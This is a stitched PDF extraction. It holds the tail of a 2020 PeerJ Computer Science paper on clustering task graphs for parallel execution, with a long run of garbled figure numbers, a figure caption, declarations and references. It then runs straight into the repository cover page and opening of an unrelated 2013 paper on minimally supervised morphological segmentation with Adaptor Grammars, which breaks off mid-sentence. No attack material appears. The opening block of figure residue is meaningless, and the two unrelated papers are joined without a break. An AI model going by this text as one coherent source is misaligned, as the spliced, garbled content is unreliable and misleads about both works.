[1/151] 623 [1/152]638 [1/170] 637 [1/169] 6 [1/1] 262 [1/50] 334 [1/82] 406 [1/113] 478 [1/116] 550 [1/148] 629 [1/166] 622 [1/152]636 [1/169] 327 [1/82] 399 [1/84] 471 [1/116] 543 [1/133] 615 [1/152] 695 [1/185]702 [1/187]703 [1/188] 694 [1/170] 701 [1/170] 687 [1/166] 5 [1/1] 261 [1/64] 333 [1/94] 405 [1/99] 477 [1/132] 549 [1/148] 628 [1/155] 621 [1/151] 635 [1/155] 326 [1/65] 398 [1/110] 470 [1/114] 542 [1/146] 614 [1/151] 693 [1/184] 700 [1/186] 686 [1/183] 391 [1/83] 463 [1/114] 535 [1/133] 607 [1/149] 679 [1/181] 767 [1/188] 759 [1/188] 758 [1/187] 751 [1/185]766 [1/188] 765 [1/187] 4 [1/1] 260 [1/49] 332 [1/81] 404 [1/98] 476 [1/131] 548 [1/147] 627 [1/165] 620 [1/164] 634 [1/168] 325 [1/81] 397 [1/97] 469 [1/113] 541 [1/132] 613 [1/162] 692 [1/169] 699 [1/169]685 [1/166] 390 [1/82] 462 [1/113] 534 [1/116] 606 [1/148] 678 [1/162] 757 [1/199] 750 [1/183]764 [1/186] 455 [1/129] 527 [1/140] 599 [1/159] 671 [1/178] 743 [1/181] 823 [1/216]830 [1/219]831 [1/220] 822 [1/216] 829 [1/218] 815 [1/214] 3 [1/0] 259 [1/63] 331 [1/93] 403 [1/112] 475 [1/131] 547 [1/134] 626 [1/154] 619 [1/153] 633 [1/154] 324 [1/64] 396 [1/94] 468 [1/112] 540 [1/132] 612 [1/150] 691 [1/184] 698 [1/185]684 [1/182] 389 [1/94] 461 [1/110] 533 [1/132] 605 [1/148] 677 [1/162] 756 [1/186] 749 [1/198] 763 [1/186] 454 [1/110] 526 [1/114] 598 [1/146] 670 [1/177] 742 [1/183] 821 [1/215] 828 [1/187] 814 [1/213] 519 [1/129] 591 [1/140] 663 [1/159] 735 [1/181] 807 [1/185] 895 [1/234] 887 [1/220] 886 [1/219] 879 [1/230]894 [1/220] 893 [1/219] 2 [1/0] 258 [1/48] 330 [1/80] 402 [1/96] 474 [1/115] 546 [1/146] 625 [1/165] 618 [1/164]632 [1/167] 323 [1/80] 395 [1/96] 467 [1/112] 539 [1/145] 611 [1/147] 690 [1/168] 697 [1/168]683 [1/182] 388 [1/81] 460 [1/98] 532 [1/142] 604 [1/147] 676 [1/180] 755 [1/184] 748 [1/198] 762 [1/201] 453 [1/97] 525 [1/113] 597 [1/142] 669 [1/162] 741 [1/180] 820 [1/215] 827 [1/217]813 [1/213] 518 [1/129] 590 [1/140] 662 [1/159] 734 [1/178] 806 [1/183] 885 [1/218] 878 [1/216]892 [1/218] 583 [1/140] 655 [1/159] 727 [1/178] 799 [1/181] 871 [1/214] 951 [1/234]958 [1/234]959 [1/234] 950 [1/220] 957 [1/251] 943 [1/230] 1 [1/0] 257 [1/62] 329 [1/92] 401 [1/111] 473 [1/115] 545 [1/119] 624 [1/153] 617 [1/163] 322 [1/63] 394 [1/93] 466 [1/115] 538 [1/131] 610 [1/161] 689 [1/165] 696 [1/167] 682 [1/164] 387 [1/93] 459 [1/112] 531 [1/131] 603 [1/145] 675 [1/161] 754 [1/199] 747 [1/184] 761 [1/200] 452 [1/94] 524 [1/139] 596 [1/142] 668 [1/150] 740 [1/196] 819 [1/199] 826 [1/201]812 [1/212] 517 [1/110] 589 [1/158] 661 [1/175] 733 [1/177] 805 [1/212] 884 [1/215] 877 [1/229] 891 [1/217] 582 [1/129] 654 [1/173] 726 [1/177] 798 [1/210] 870 [1/213] 949 [1/248] 956 [1/219] 942 [1/230] 647 [1/171] 719 [1/193] 791 [1/207] 863 [1/225] 935 [1/230] 1023 [1/263] 1015 [1/262] 1014 [1/248] 1007 [1/260]1022 [1/263] 1021 [1/251] 0 [1/0] 256 [1/47] 328 [1/79] 400 [1/95] 472 [1/117] 544 [1/118] 616 [1/163] 321 [1/79] 393 [1/95] 465 [1/130] 537 [1/144] 609 [1/149] 688 [1/167] 681 [1/165] 386 [1/80] 458 [1/96] 530 [1/141] 602 [1/146] 674 [1/164] 753 [1/168] 746 [1/182]760 [1/200] 451 [1/128] 523 [1/138] 595 [1/145] 667 [1/147] 739 [1/182] 818 [1/201] 825 [1/201]811 [1/198] 516 [1/128] 588 [1/142] 660 [1/174] 732 [1/180] 804 [1/198] 883 [1/217] 876 [1/215] 890 [1/217] 581 [1/157] 653 [1/173] 725 [1/175] 797 [1/180] 869 [1/213] 948 [1/218] 955 [1/250]941 [1/229] 646 [1/157] 718 [1/173] 790 [1/178] 862 [1/210] 934 [1/216] 1013 [1/251] 1006 [1/260]1020 [1/251] 711 [1/171] 783 [1/204] 855 [1/207] 927 [1/244] 999 [1/258] 1079 [1/279]1086 [1/283]1087 [1/284] 1078 [1/263] 1085 [1/263] 1071 [1/262] 320 [1/62] 392 [1/92] 464 [1/111] 536 [1/143] 608 [1/143] 680 [1/163] 385 [1/92] 457 [1/111] 529 [1/141] 601 [1/160] 673 [1/179] 752 [1/167] 745 [1/197] 450 [1/93] 522 [1/138] 594 [1/141] 666 [1/161] 738 [1/195] 817 [1/214] 824 [1/200] 810 [1/199] 515 [1/128] 587 [1/139] 659 [1/145] 731 [1/161] 803 [1/196] 882 [1/232] 875 [1/228] 889 [1/233] 580 [1/139] 652 [1/158] 724 [1/175] 796 [1/196] 868 [1/227] 947 [1/247] 954 [1/249]940 [1/229] 645 [1/158] 717 [1/175] 789 [1/177] 861 [1/212] 933 [1/229] 1012 [1/248] 1005 [1/248] 1019 [1/250] 710 [1/190] 782 [1/193] 854 [1/210] 926 [1/243] 998 [1/243] 1077 [1/278] 1084 [1/282] 1070 [1/277] 775 [1/193] 847 [1/207] 919 [1/241] 991 [1/244] 1063 [1/274] 1151 [1/284] 1143 [1/284] 1142 [1/283] 1135 [1/279]1150 [1/284] 1149 [1/283] 384 [1/79] 456 [1/95] 528 [1/130] 600 [1/144] 672 [1/163] 744 [1/196] 449 [1/127] 521 [1/130] 593 [1/144] 665 [1/176] 737 [1/195] 816 [1/200] 809 [1/197] 514 [1/128] 586 [1/157] 658 [1/174] 730 [1/176] 802 [1/195] 881 [1/231] 874 [1/228]888 [1/233] 579 [1/138] 651 [1/172] 723 [1/194] 795 [1/209] 867 [1/226] 946 [1/232] 953 [1/249]939 [1/228] 644 [1/157] 716 [1/192] 788 [1/206] 860 [1/225] 932 [1/227] 1011 [1/250] 1004 [1/259] 1018 [1/250] 709 [1/173] 781 [1/203] 853 [1/206] 925 [1/225] 997 [1/257] 1076 [1/278] 1083 [1/281]1069 [1/260] 774 [1/190] 846 [1/204] 918 [1/210] 990 [1/244] 1062 [1/260] 1141 [1/299] 1134 [1/277]1148 [1/282] 839 [1/204] 911 [1/207] 983 [1/244] 1055 [1/258] 1127 [1/274] 1207 [1/309]1214 [1/312]1215 [1/313] 1206 [1/309] 1213 [1/312] 1199 [1/308] 448 [1/92] 520 [1/111] 592 [1/143] 664 [1/160] 736 [1/179] 808 [1/197] 513 [1/127] 585 [1/141] 657 [1/160] 729 [1/179] 801 [1/197] 880 [1/231] 873 [1/214] 578 [1/138] 650 [1/172] 722 [1/174] 794 [1/208] 866 [1/208] 945 [1/247] 952 [1/233] 938 [1/232] 643 [1/139] 715 [1/191] 787 [1/194] 859 [1/209] 931 [1/246] 1010 [1/261] 1003 [1/259] 1017 [1/262] 708 [1/158] 780 [1/192] 852 [1/206] 924 [1/227] 996 [1/257] 1075 [1/261] 1082 [1/280]1068 [1/276] 773 [1/190] 845 [1/203] 917 [1/212] 989 [1/243] 1061 [1/257] 1140 [1/282] 1133 [1/296] 1147 [1/282] 838 [1/193] 910 [1/238] 982 [1/243] 1054 [1/271] 1126 [1/277] 1205 [1/308] 1212 [1/283] 1198 [1/296] 903 [1/235] 975 [1/241] 1047 [1/269] 1119 [1/274] 1191 [1/279] 1279 [1/313] 1271 [1/313] 1270 [1/319] 1263 [1/309]1278 [1/313] 1277 [1/319] 512 [1/127] 584 [1/130] 656 [1/144] 728 [1/176] 800 [1/211] 872 [1/227] 577 [1/156] 649 [1/171] 721 [1/176] 793 [1/195] 865 [1/226] 944 [1/233] 937 [1/231] 642 [1/171] 714 [1/174] 786 [1/194] 858 [1/209] 930 [1/228] 1009 [1/249] 1002 [1/232]1016 [1/249] 707 [1/189] 779 [1/194] 851 [1/209] 923 [1/242] 995 [1/246] 1074 [1/261] 1081 [1/280]1067 [1/259] 772 [1/192] 844 [1/206] 916 [1/225] 988 [1/242] 1060 [1/273] 1139 [1/281] 1132 [1/278] 1146 [1/281] 837 [1/203] 909 [1/237] 981 [1/255] 1053 [1/271] 1125 [1/273] 1204 [1/299] 1211 [1/311]1197 [1/299] 902 [1/204] 974 [1/253] 1046 [1/269] 1118 [1/293] 1190 [1/307] 1269 [1/312] 1262 [1/309]1276 [1/312] 967 [1/235] 1039 [1/267] 1111 [1/269] 1183 [1/306] 1255 [1/308] 576 [1/127] 648 [1/143] 720 [1/160] 792 [1/179] 864 [1/211] 936 [1/231] 641 [1/156] 713 [1/172] 785 [1/205] 857 [1/208] 929 [1/226] 1008 [1/247] 1001 [1/247] 706 [1/172] 778 [1/191] 850 [1/208] 922 [1/241] 994 [1/246] 1073 [1/262] 1080 [1/279] 1066 [1/261] 771 [1/191] 843 [1/223] 915 [1/240] 987 [1/246] 1059 [1/259] 1138 [1/298] 1131 [1/276] 1145 [1/300] 836 [1/192] 908 [1/236] 980 [1/254] 1052 [1/257] 1124 [1/276] 1203 [1/298] 1210 [1/310]1196 [1/296] 901 [1/203] 973 [1/238] 1045 [1/255] 1117 [1/271] 1189 [1/296] 1268 [1/319] 1261 [1/308] 1275 [1/311] 966 [1/238] 1038 [1/266] 1110 [1/291] 1182 [1/293] 1254 [1/307] 1031 [1/241] 1103 [1/288] 1175 [1/291] 1247 [1/306] 640 [1/156] 712 [1/190] 784 [1/205] 856 [1/211] 928 [1/245] 1000 [1/258] 705 [1/189] 777 [1/202] 849 [1/224] 921 [1/226] 993 [1/245] 1072 [1/277] 1065 [1/275] 770 [1/189] 842 [1/223] 914 [1/240] 986 [1/242] 1058 [1/272] 1137 [1/280] 1130 [1/275]1144 [1/280] 835 [1/221] 907 [1/236] 979 [1/242] 1051 [1/270] 1123 [1/273] 1202 [1/298] 1209 [1/310]1195 [1/281] 900 [1/221] 972 [1/237] 1044 [1/255] 1116 [1/273] 1188 [1/278] 1267 [1/311] 1260 [1/299] 1274 [1/311] 965 [1/237] 1037 [1/255] 1109 [1/271] 1181 [1/293] 1253 [1/307] 1030 [1/264] 1102 [1/269] 1174 [1/293] 1246 [1/307] 1095 [1/267] 1167 [1/288] 1239 [1/306] 704 [1/156] 776 [1/202] 848 [1/205] 920 [1/211] 992 [1/245] 1064 [1/274] 769 [1/189] 841 [1/222] 913 [1/239] 985 [1/256] 1057 [1/272] 1136 [1/297] 1129 [1/275] 834 [1/191] 906 [1/223] 978 [1/254] 1050 [1/270] 1122 [1/272] 1201 [1/300] 1208 [1/300] 1194 [1/298] 899 [1/235] 971 [1/253] 1043 [1/268] 1115 [1/270] 1187 [1/276] 1266 [1/318] 1259 [1/318] 1273 [1/319] 964 [1/236] 1036 [1/266] 1108 [1/268] 1180 [1/305] 1252 [1/317] 1029 [1/238] 1101 [1/287] 1173 [1/291] 1245 [1/316] 1094 [1/285] 1166 [1/291] 1238 [1/316] 1159 [1/288] 1231 [1/315] 768 [1/202] 840 [1/205] 912 [1/224] 984 [1/245] 1056 [1/258] 1128 [1/295] 833 [1/221] 905 [1/224] 977 [1/240] 1049 [1/256] 1121 [1/275] 1200 [1/297] 1193 [1/295] 898 [1/223] 970 [1/240] 1042 [1/254] 1114 [1/292] 1186 [1/306] 1265 [1/310] 1258 [1/318]1272 [1/310] 963 [1/236] 1035 [1/253] 1107 [1/290] 1179 [1/304] 1251 [1/317] 1028 [1/237] 1100 [1/266] 1172 [1/303] 1244 [1/305] 1093 [1/285] 1165 [1/302] 1237 [1/315] 1158 [1/285] 1230 [1/302] 1223 [1/288] 832 [1/202] 904 [1/222] 976 [1/239] 1048 [1/256] 1120 [1/294] 1192 [1/297] 897 [1/222] 969 [1/239] 1041 [1/256] 1113 [1/272] 1185 [1/294] 1264 [1/300] 1257 [1/318] 962 [1/235] 1034 [1/254] 1106 [1/270] 1178 [1/304] 1250 [1/317] 1027 [1/253] 1099 [1/268] 1171 [1/290] 1243 [1/305] 1092 [1/266] 1164 [1/287] 1236 [1/305] 1157 [1/287] 1229 [1/302]1222 [1/314] 896 [1/221] 968 [1/224] 1040 [1/267] 1112 [1/292] 1184 [1/295] 1256 [1/297] 961 [1/252] 1033 [1/265] 1105 [1/289] 1177 [1/292] 1249 [1/317] 1026 [1/264] 1098 [1/286] 1170 [1/303] 1242 [1/316] 1091 [1/264] 1163 [1/290] 1235 [1/315] 1156 [1/285] 1228 [1/315]1221 [1/302] 960 [1/222] 1032 [1/239] 1104 [1/289] 1176 [1/294] 1248 [1/316] 1025 [1/252] 1097 [1/265] 1169 [1/289] 1241 [1/304] 1090 [1/264] 1162 [1/286] 1234 [1/304] 1155 [1/268] 1227 [1/290]1220 [1/287] 1024 [1/252] 1096 [1/267] 1168 [1/292] 1240 [1/295] 1089 [1/265] 1161 [1/301] 1233 [1/303] 1154 [1/286] 1226 [1/303]1219 [1/314] 1088 [1/252] 1160 [1/289] 1232 [1/294] 1153 [1/265] 1225 [1/314]1218 [1/286] 1152 [1/301] 1224 [1/314] 1217 [1/301] 1216 [1/301] (a) Total time = 393.100000 s W o rk er 0 W o rk er 1 W o rk er 2 W o rk er 3 W o rk er 4 W o rk er 5 W o rk er 6 W o rk er 7 S u b m it ed R ea d y 3840 64 (b) Total time = 351.300000 s W o rk er 0 W o rk er 1 W o rk er 2 W o rk er 3 W o rk er 4 W o rk er 5 W o rk er 6 W o rk er 7 S u b m it ed R ea d y 960 4 (c) Figure A3 Example of the Polybench Jacobi 2D clustering and execution. The graph was generated with parameter iter =10 and N =10. The execution time obtained with granularity, (C), is slower than without granularity, (B), because the overhead is limited and the dependencies makes it difficult to find a meta- graph where the parallelism is not constraint. (A) Clustered graph with M = 4. Original graph has 1,280 nodes and estimated degree of parallelism of 56, clustered one has 320 nodes and estimated degree of par- allelism of 4.2. (B) Emulation of the execution of the original graph with 8 threads in 391 units of time. Each original task has a cost of 1, the overhead are 0 per task, 0.1 per push and 0.2 per pop. (C) Emulation of the execution of the clustered graph with 8 threads in 351.3 units of time. Each original task has a cost of 1, the overhead are 0 per task, 0.1 per push and 0.2 per pop. Full-size DOI: 10.7717/peerjcs.247/fig-9 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 22/26 https://peerj.com https://doi.org/10.7717/peerjcs.247/fig-9 http://dx.doi.org/10.7717/peerj-cs.247 Competing Interests The authors declare there are no competing interests. Author Contributions • Bérenger Bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Alain Ketterlin analyzed the data, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: An implementation of our method is publicly available at https://gitlab.inria.fr/bramas/ dagpar. The graphs used in this project are available at https://figshare.com/projects/ Dagpar/71198. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.247#supplemental-information. REFERENCES Agullo E, Aumage O, Bramas B, Coulaud O, Pitoiset S. 2017. Bridging the gap between OpenMP and task-based runtime systems for the fast multipole method. IEEE Transactions on Parallel and Distributed Systems 28(10):2794–2807 DOI 10.1109/TPDS.2017.2697857. Agullo E, Bramas B, Coulaud O, Darve E, Messner M, Takahashi T. 2016. Task-based FMM for heterogeneous architectures. Concurrency and Computation: Practice and Experience 28(9):2608–2629 DOI 10.1002/cpe.3723. Agullo E, Buttari A, Guermouche A, Lopez F. 2015. Task-based multifrontal QR solver for GPU-accelerated multicore architectures. In: 2015 IEEE 22nd international conference on high performance computing (HiPC). Piscataway: IEEE, 54–63 DOI 10.1109/HiPC.2015.27. Augonnet C, Thibault S, Namyst R, Wacrenier P-A. 2011. StarPU: a unified platform for task scheduling on heterogeneous multicore architectures. Concurrency and Computation: Practice and Experience 23(2):187–198 DOI 10.1002/cpe.1631. Bauer M, Treichler S, Slaughter E, Aiken A. 2012. Legion: expressing locality and independence with logical regions. In: International conference on high performance computing, networking, storage and analysis. Piscataway: IEEE, 66. Bramas B. 2016. Optimization and parallelization of the boundary element method for the wave equation in time domain. PhD thesis, Bordeaux University. Bramas B. 2019a. Impact study of data locality on task-based applications through the Heteroprio scheduler. PeerJ Computer Science 5:e190 DOI 10.7717/peerj-cs.190. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 23/26 https://peerj.com https://gitlab.inria.fr/bramas/dagpar https://gitlab.inria.fr/bramas/dagpar https://figshare.com/projects/Dagpar/71198 https://figshare.com/projects/Dagpar/71198 http://dx.doi.org/10.7717/peerj-cs.247#supplemental-information http://dx.doi.org/10.7717/peerj-cs.247#supplemental-information http://dx.doi.org/10.1109/TPDS.2017.2697857 http://dx.doi.org/10.1002/cpe.3723 http://dx.doi.org/10.1109/HiPC.2015.27 http://dx.doi.org/10.1002/cpe.1631 http://dx.doi.org/10.7717/peerj-cs.190 http://dx.doi.org/10.7717/peerj-cs.247 Bramas B. 2019b. Increasing the degree of parallelism using speculative execution in task-based runtime systems. PeerJ Computer Science 5:e183 DOI 10.7717/peerj-cs.183. Carpaye JMC, Roman J, Brenner P. 2018. Design and analysis of a task-based parallelization over a runtime system of an explicit finite-volume CFD code with adaptive time stepping. Journal of Computational Science 28:439–454 DOI 10.1016/j.jocs.2017.03.008. Cong J, Li Z, Bagrodia R. 1994. Acyclic multi-way partitioning of boolean networks. In: 31st design automation conference. 670–675 DOI 10.1145/196244.196609. Coulette D, Franck E, Helluy P, Mehrenberger M, Navoret L. 2019. High-order implicit palindromic discontinuous Galerkin method for kinetic-relaxation approximation. Comput. & Fluids 190:485–502 DOI 10.1016/j.compfluid.2019.06.007. Danalis A, Bosilca G, Bouteiller A, Herault T, Dongarra J. 2014. PTG: an abstraction for unhindered parallelism. In: Proceedings of the fourth international workshop on domain-specific languages and high-level frameworks for high performance computing, (WOLFHPC), IEEE. Piscataway: IEEE, 21–30. Fiduccia CM, Mattheyses RM. 1982. A linear-time heuristic for improving network par- titions. In: 19th design automation conference. 175–181 DOI 10.1109/DAC.1982.1585498. Gautier T, Lima JVF, Maillard N, Raffin B. 2013. XKaapi: a runtime system for data-flow task programming on heterogeneous architectures. In: 2013 IEEE 27th international symposium on parallel & distributed processing (IPDPS). IEEE, 1299–1308. Grauer-Gray S, Xu L, Searles R, Ayalasomayajula S, Cavazos J. 2012. Auto-tuning a high-level language targeted to GPU codes. In: 2012 innovative parallel computing (InPar). 1–10 DOI 10.1109/InPar.2012.6339595. Hendrickson B, Kolda TG. 2000. Graph partitioning models for parallel computing. Parallel Computing 26(12):1519–1534 DOI 10.1016/S0167-8191(00)00048-X. Hendrickson B, Leland R. 1995. A multi-level algorithm for partitioning graphs. In: Supercomputing ’95:proceedings of the 1995 ACM/IEEE conference on supercomputing. Piscataway: IEEE, 28–28 DOI 10.1109/SUPERC.1995.242799. Herrmann J, Kho J, Uçar B, Kaya K, Catalyurek U. 2017. Acyclic partitioning of large directed acyclic graphs. In: 2017 17th IEEE/ACM international symposium on cluster, cloud and grid computing (CCGRID). Piscataway: IEEE, 371–380 DOI 10.1109/CCGRID.2017.101. Johnson DS, Garey MR. 1979. Computers and intractability: a guide to the theory of NP- completeness. New York: WH Freeman. Karypis G, Aggarwa R, Kumar V, Shekhar S. 1999. Multilevel hypergraph partitioning: applications in VLSI domain. IEEE Transactions on Very Large Scale Integration (VLSI) Systems 7(1):69–79 DOI 10.1109/92.748202. Karypis G, Kumar V. 1998. A fast and high quality multilevel scheme for parti- tioning irregular graphs. SIAM Journal on Scientific Computing 20(1):359–392 DOI 10.1137/S1064827595287997. Kernighan B, Lin S. 1970. An efficient heuristic procedure for partitioning graphs. The Bell System Technical Journal 49(2):291–307 DOI 10.1002/j.1538-7305.1970.tb01770.x. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 24/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.183 http://dx.doi.org/10.1016/j.jocs.2017.03.008 http://dx.doi.org/10.1145/196244.196609 http://dx.doi.org/10.1016/j.compfluid.2019.06.007 http://dx.doi.org/10.1109/DAC.1982.1585498 http://dx.doi.org/10.1109/InPar.2012.6339595 http://dx.doi.org/10.1016/S0167-8191(00)00048-X http://dx.doi.org/10.1109/SUPERC.1995.242799 http://dx.doi.org/10.1109/CCGRID.2017.101 http://dx.doi.org/10.1109/92.748202 http://dx.doi.org/10.1137/S1064827595287997 http://dx.doi.org/10.1002/j.1538-7305.1970.tb01770.x http://dx.doi.org/10.7717/peerj-cs.247 Kernighan BW. 1971. Optimal sequential partitions of graphs. Journal of the ACM 18(1):34–40 DOI 10.1145/321623.321627. Kestor G, Gioiosa R, Chavarra-Miranda D. 2015. Prometheus: scalable and accurate em- ulation of task-based applications on many-core systems. In: 2015 IEEE international symposium on performance analysis of systems and software (ISPASS). Piscataway: IEEE, 308–317 DOI 10.1109/ISPASS.2015.7095816. Moustafa S, Kirschenmann W, Dupros F, Aochi H. 2018. Task-based programming on emerging parallel architectures for finite-differences seismic numerical kernel. In: Aldinucci M, Padovani L, Torquati M, eds. Euro-Par 2018: parallel processing. Cham: Springer International Publishing, 764–777. Myllykoski M, Mikkelsen CCK. 2019. Introduction to StarNEig—a task-based library for solving nonsymmetric eigenvalue problems. ArXiv preprint. arXiv:1905.04975. OpenMP Architecture Review Board. 2013. OpenMP application program interface version 4.0. Available at http://www.openmp.org/wp-content/uploads/OpenMP4.0. 0.pdf . Perez JM, Badia RM, Labarta J. 2008. A dependency-aware task-based programming environment for multi-core architectures. In: 2008 IEEE international conference on cluster computing. IEEE, 142–151. Pothen A, Alvarado LF. 1992. A fast reordering algorithm for parallel sparse triangular solution. SIAM Journal on Scientific and Statistical Computing 13(2):645–653 DOI 10.1137/0913036. Purna KMG, Bhatia D. 1999. Temporal partitioning and scheduling data flow graphs for reconfigurable computers. IEEE Transactions on Computers 48(6):579–590 DOI 10.1109/12.773795. Rossignon C. 2015. Un modéle de programmation á grain fin pour la parallélisation de solveurs linéaires creux. PhD thesis, Bordeaux University. Rossignon C, Pascal H, Aumage O, Thibault S. 2013. A numa-aware fine grain par- allelization framework for multi-core architecture. In: 2013 IEEE international symposium on parallel distributed processing, workshops and Phd forum. Piscataway: IEEE, 1381–1390 DOI 10.1109/IPDPSW.2013.204. Sarkar V. 1989. Partitioning and scheduling parallel programs for multiprocessors. Cam- bridge: MIT Press. Sarkar V, Hennessy J. 1986. Partitioning parallel programs for macro-dataflow. Technical report. Stanford Univ CA Computer Systems Lab. Schaeffer SE. 2007. Survey: graph clustering. Computer Science Review 1(1):27–64 DOI 10.1016/j.cosrev.2007.05.001. Shun J, Roosta-Khorasani F, Fountoulakis K, Mahoney MW. 2016. Parallel local graph clustering. ArXiv preprint. arXiv:1604.07515. Sukkari D, Ltaief H, Faverge M, Keyes D. 2018. Asynchronous task-based polar decom- position on single node manycore architectures. IEEE Transactions on Parallel and Distributed Systems 29(2):312–323 DOI 10.1109/TPDS.2017.2755655. Suter F. 2013. DAGGEN: a synthethic task graph generator. Available at https://github. com/frs69wq/daggen (accessed on January 2019). Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 25/26 https://peerj.com http://dx.doi.org/10.1145/321623.321627 http://dx.doi.org/10.1109/ISPASS.2015.7095816 http://arXiv.org/abs/1905.04975 http://www.openmp.org/wp-content/uploads/OpenMP4.0.0.pdf http://www.openmp.org/wp-content/uploads/OpenMP4.0.0.pdf http://dx.doi.org/10.1137/0913036 http://dx.doi.org/10.1109/12.773795 http://dx.doi.org/10.1109/IPDPSW.2013.204 http://dx.doi.org/10.1016/j.cosrev.2007.05.001 http://arXiv.org/abs/1604.07515 http://dx.doi.org/10.1109/TPDS.2017.2755655 https://github.com/frs69wq/daggen https://github.com/frs69wq/daggen http://dx.doi.org/10.7717/peerj-cs.247 Tagliavini G, Cesarini D, Marongiu A. 2018. Unleashing fine-grained paral- lelism on embedded many-core accelerators with lightweight OpenMP task- ing. IEEE Transactions on Parallel and Distributed Systems 29(9):2150–2163 DOI 10.1109/TPDS.2018.2814602. Tillenius M. 2015. Superglue: a shared memory framework using data versioning for dependency-aware task-based parallelization. SIAM Journal on Scientific Computing 37(6):C617–C642 DOI 10.1137/140989716. Xu D, Tian Y. 2015. A comprehensive survey of clustering algorithms. Annals of Data Science 2(2):165–193 DOI 10.1007/s40745-015-0040-1. Bramas and Ketterlin (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.247 26/26 https://peerj.com http://dx.doi.org/10.1109/TPDS.2018.2814602 http://dx.doi.org/10.1137/140989716 http://dx.doi.org/10.1007/s40745-015-0040-1 http://dx.doi.org/10.7717/peerj-cs.247 work_gdvuyjkrdbdftihkio6n2lmzhi ---- Edinburgh Research Explorer Minimally-Supervised Morphological Segmentation using Adaptor Grammars Citation for published version: Sirts, K & Goldwater, S 2013, 'Minimally-Supervised Morphological Segmentation using Adaptor Grammars', Transactions of the Association for Computational Linguistics, vol. 1, no. May, pp. 231-242. <http://aclweb.org/anthology//Q/Q13/Q13-1021.pdf> Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 http://aclweb.org/anthology//Q/Q13/Q13-1021.pdf https://www.research.ed.ac.uk/portal/en/publications/minimallysupervised-morphological-segmentation-using-adaptor-grammars(e5fc4878-09a7-4307-9b93-8934e8059e8b).html Transactions of the Association for Computational Linguistics, 1 (2013) 255–266. Action Editor: Kristina Toutanova. Submitted 11/2012; Published 5/2013. c©2013 Association for Computational Linguistics. Minimally-Supervised Morphological Segmentation using Adaptor Grammars Kairit Sirts Institute of Cybernetics Tallinn University of Technology sirts@phon.ioc.ee Sharon Goldwater School of Informatics The University of Edinburgh sgwater@inf.ed.ac.uk Abstract This paper explores the use of Adaptor Gram- mars, a nonparametric Bayesian modelling framework, for minimally supervised morpho- logical segmentation. We compare three train- ing methods: unsupervised training, semi- supervised training, and a novel model selec- tion method. In the model selection method, we train unsupervised Adaptor Grammars us- ing an over-articulated metagrammar, then use a small labelled data set to select which poten- tial morph boundaries identified by the meta- grammar should be returned in the final output. We evaluate on five languages and show that semi-supervised training provides a boost over unsupervised training, while the model selec- tion method yields the best average results over all languages and is competitive with state-of- the-art semi-supervised systems. Moreover, this method provides the potential to tune per- formance according to different evaluation met- rics or downstream tasks. 1 Introduction Research into unsupervised learning of morphology has a long history, starting with the work of Harris (1951). While early research was mostly motivated by linguistic interests, more recent work in NLP often aims to reduce data sparsity in morphologically rich languages for tasks such as automatic speech recogni- tion, statistical machine translation, or automatic text generation. For these applications, however, com- pletely unsupervised systems may not be ideal if even a small amount of segmented training data is available. In this paper, we explore the use of Adap- tor Grammars (Johnson et al., 2007) for minimally supervised morphological segmentation. Adaptor Grammars (AGs) are a nonparametric Bayesian modelling framework that can learn latent tree structures over an input corpus of strings. For example, they can be used to define a morpholog- ical grammar where each word consists of zero or more prefixes, a stem, and zero or more suffixes; the actual forms of these morphs (and the segmentation of words into morphs) are learned from the data. In this general approach AGs are similar to many other unsupervised morphological segmentation systems, such as Linguistica (Goldsmith, 2001) and the Mor- fessor family (Creutz and Lagus, 2007). A major difference, however, is that the morphological gram- mar is specified as an input to the program, rather than hard-coded, which allows different grammars to be explored easily. For the task of segmenting utterances into words, for example, Johnson and col- leagues have experimented with grammars encoding different kinds of sub-word and super-word structure (e.g., syllables and collocations), showing that the best grammars far outperform other systems on the same corpora (Johnson, 2008a; Johnson and Goldwa- ter, 2009; Johnson and Demuth, 2010). These word segmentation papers demonstrated both the power of the AG approach and the syner- gistic behavior that occurs when learning multiple levels of structure simultaneously. However, the best- performing grammars were selected using the same corpus that was used for final testing, and each paper dealt with only one language. The ideal unsuper- vised learner would use a single grammar tuned on 255 one or more development languages and still perform well on other languages where development data is unavailable. Indeed, this is the basic principle be- hind Linguistica and Morfessor. However, we know that different languages can have very different mor- phological properties, so using a single grammar for all languages may not be the best approach if there is a principled way to choose between grammars. Though AGs make it easy to try many different pos- sible grammars, the process of proposing and testing plausible options can still be time-consuming. In this paper, we propose a novel method for au- tomatically selecting good morphological grammars for different languages (English, Finnish, Turkish, German, and Estonian) using a small amount of gold-segmented data (1000 word types). We use the AG framework to specify a very general binary- branching grammar of depth four with which we learn a parse tree of each word that contains several possible segmentation splits for the word. Then, we use the gold-segmented data to learn, for each lan- guage, which of the proposed splits from the original grammar should actually be used in order to best segment that language. We evaluate our approach on both a small devel- opment set and the full Morpho Challenge test set for each language—up to three million word types. In doing so, we demonstrate that using the posterior grammar of an AG model to decode unseen data is a feasible way to scale these models to large data sets. We compare to several baselines which use the annotated data to different degrees: parameter tuning, grammar tuning, supervised training, or no use of annotated data. In addition to existing approaches— unsupervised and semi-supervised Morfessor, unsu- pervised 